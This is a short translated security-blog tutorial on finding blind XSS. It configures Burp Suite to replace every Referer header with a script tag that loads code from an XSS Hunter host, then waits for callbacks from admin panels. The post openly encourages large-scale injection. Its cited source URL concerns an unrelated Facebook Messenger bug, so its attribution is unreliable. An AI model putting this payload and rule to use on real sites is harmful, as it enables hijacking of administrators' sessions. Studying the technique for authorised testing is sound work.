這篇文章中我將分享一個我在某網站上發現的盲XSS。同時,我會向大家推薦一種新的盲XSS的工具。
盲XSS是跨站腳本的一種(XSS),攻擊者「盲目地」在網頁中輸入一系列XSS的payload,希望能保存到資料庫或文件中,攻擊後端管理者。
目前,我使用XSS hunter(網頁版)來尋找找出盲XSS。
XSShunter:
XSS Hunter是最近才推出的平台,提供大量的payload,同時可以監控和管理XSS的反饋。通過它,你可以發動各種XSS攻擊,配合burpsuite能進行大規模盲XSS攻擊。
第1步:要在burpsuite創建新規則,因為沒有任何預定義的規則,單擊「添加」,就可以看到一個新規則對話框。單擊「類型」的下拉列表,選擇「Request header」。
然後,添加^Referer.*$作為「匹配」條件。這裡使用了正則表達式,作用是匹配任何以Referer開頭的字元串。在HTTP請求中,一般存在一個Referer請求頭。
^Referer.*$
接下來,將「替換」文本設置為Referer: 「><sc ript src=https://newone.xss.ht></sc ript>。然後,選中「正則表達式匹配」複選框,最後單擊「確定」。
Referer: 「><sc ript src=https://newone.xss.ht></sc ript>
第2步:通過burpsuite攔截,你可以在「原始」請求中看到,Referer: 「><script src=https://newone.xss.ht></script>已被替換上去!
Referer: 「><script src=https://newone.xss.ht></script>
第3步:幾個小時後,當我再次登錄XXS SHunter時,我已經獲得了一個盲XSS。
本文由白帽彙整理並翻譯,不代表白帽匯任何觀點和立場 來源:https://www.vulnano.com/2019/03/facebook-messenger-server-random-memory.html
本文由白帽彙整理並翻譯,不代表白帽匯任何觀點和立場
來源:找到盲XSS漏洞的簡單方法|NOSEC安全訊息平台 - NOSEC.ORG
原文:https://www.vulnano.com/2019/03/facebook-messenger-server-random-memory.html
白帽匯從事信息安全,專註於安全大數據、企業威脅情報。
公司產品:FOFA-網路空間安全搜索引擎、FOEYE-網路空間檢索系統、NOSEC-安全訊息平台。
為您提供:網路空間測繪、企業資產收集、企業威脅情報、應急響應服務
TAG:漏洞 | 信息安全 | Web漏洞 |